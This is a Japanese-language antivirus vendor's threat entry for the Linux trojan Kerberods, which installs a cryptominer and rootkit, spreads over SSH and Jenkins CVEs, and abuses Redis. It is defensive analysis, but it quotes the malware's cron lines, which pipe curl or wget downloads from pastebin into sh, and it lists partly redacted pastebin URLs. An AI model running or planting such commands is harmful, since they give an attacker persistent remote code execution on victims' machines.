Trojan.Linux.KERBERDS.A
Trojan.Linux.Coinminer (Ikarus)
Linux
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
はい
感染報告の有無 :
はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
「Kerberods」は仮想通貨発掘マルウェア「khugepageds」(「Coinminer.Linux.MALXMR.UWEJI」として検出)とそのルートキットコンポーネントを作成します。また、Kerberodsは複数の拡散手法を持っています。1つはSSHを介した方法、もう1つは脆弱性「CVE-2019-1003000」および「CVE-2019-1003001」を利用する方法です。
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。
- /usr/local/bin/kerberods
- /usr/libexec/tmp/kerberods
- /usr/bin/kerberods
- /tmp/kerberods
マルウェアは、以下のファイルを作成します。
- /usr/local/lib/{random}.c (source code of rootkit)
- /tmp/khugepageds - detected as Coinminer.Linux.MALXMR.UWEJI
- /usr/local/lib/{random}.so (compiled executable of the source code) - detected as Rootkit.Linux.KERBERDS.A
マルウェアは、以下のプロセスを追加します。
- /tmp/khugepageds
- /usr/local/lib/{random}.so
他のシステム変更
マルウェアは、以下のファイルを改変します。
- /etc/hosts
マルウェアは、以下のファイルを削除します。
- /usr/local/bin/kerberods
- /usr/libexec/tmp/kerberods
- /usr/bin/kerberods
- /tmp/kerberods
- /etc/ld.so.preload
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- https://ident.me
<補足>
インストール
マルウェアは、以下のファイルを作成します。
- /usr/local/lib/{ランダム}.c (ルートキットのソースコード)
- /tmp/khugepageds - Coinminer.Linux.MALXMR.UWEJIとして検出
- /usr/local/lib/{ランダム}.so (コンパイルされたソースコードの実行ファイル) - Rootkit.Linux.KERBERDS.Aとして検出
その他
マルウェアは、以下を実行します。
- マルウェアは、自身の自動実行を可能にするために以下のサービスを作成します。
- /etc/init.d/netdns
- /usr/lib/systemd/system/netdns.service
- 以下のcronジョブを作成して、10分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
- Path: /etc/cron.d/root
- Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
- 以下のcronジョブを作成して、15分ごとにpastebinにあるシェルスクリプトの自動実行を可能にします。
- Paths:
- /var/spool/cron/root
- /var/spool/cron/crontabs/root
- Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{pastebinからの文字列}||wget -q -O- https://pastebin.com/raw/{pastebinからの文字列})|sh
- Paths:
- マルウェアは、以下の脆弱性を悪用することにより、他のデバイスに拡散する可能性があります。
- CVE-2019-1003000
- CVE-2019-1003001
- SSHネットワークを介して
- マルウェアは、以下のURLに接続します。
- https://pastebin.com/raw/{BLOCKED}1u (作成されたcronジョブのpastebin URLに追加される文字列を含みます)
- https://pastebin.com/raw/{BLOCKED}6H (更新を確認)
- https://pastebin.com/raw/{BLOCKED}iX (情報公開日現在のcronジョブ内の完全なURL)
- https://pastebin.com/raw/{BLOCKED}cb (脆弱なデバイス内にダウンロードされ実行されるシェルスクリプト)
- 以下のプロセスを終了します。
- "khugepageds"と名付けられたプロセス
- CPU使用率が80%以上のプロセス
- コンピュータ内にGCCをインストールして、ルートキットのソースコードをコンパイルしてから実行します。
- マルウェアは不正利用するためにRedisサーバへのアクセスを試みます。
対応方法
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Linux.KERBERDS.A」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください